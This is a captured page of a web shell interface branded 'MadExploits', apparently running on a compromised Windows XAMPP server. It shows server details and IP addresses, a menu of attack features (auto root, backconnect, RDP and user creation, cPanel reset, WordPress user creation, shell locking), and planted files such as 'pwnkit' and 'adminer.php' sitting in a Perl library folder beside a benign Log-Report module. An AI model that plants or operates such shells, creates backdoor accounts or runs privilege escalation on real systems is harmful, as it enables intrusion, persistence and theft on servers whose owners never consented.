Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.214
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
perl /
vendor /
lib /
Dancer2 /
Plugin /
LogReport /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
Message.pm
1.04
KB
-rw-rw-rw-
Message.pod
2.18
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Message.pm
# Copyrights 2007-2021 by [Mark Overmeer <markov@cpan.org>]. # For other contributors see ChangeLog. # See the manual pages for details on the licensing terms. # Pod stripped from pm file by OODoc 2.02. # This code is part of distribution Log-Report. Meta-POD processed with # OODoc into POD and HTML manual-pages. See README.md # Copyright Mark Overmeer. Licensed under the same terms as Perl itself. package Dancer2::Plugin::LogReport::Message; use vars '$VERSION'; $VERSION = '1.31'; use parent 'Log::Report::Message'; use strict; use warnings; sub init($) { my ($self, $args) = @_; $self->SUPER::init($args); $self; } sub reason { my $self = shift; $self->{reason} = $_[0] if exists $_[0]; $self->{reason}; } my %reason2color = ( TRACE => 'info' , ASSERT => 'info' , INFO => 'info' , NOTICE => 'info' , WARNING => 'warning' , MISTAKE => 'warning' ); sub bootstrap_color { my $self = shift; return 'success' if $self->inClass('success'); $reason2color{$self->reason} || 'danger'; } 1;
Close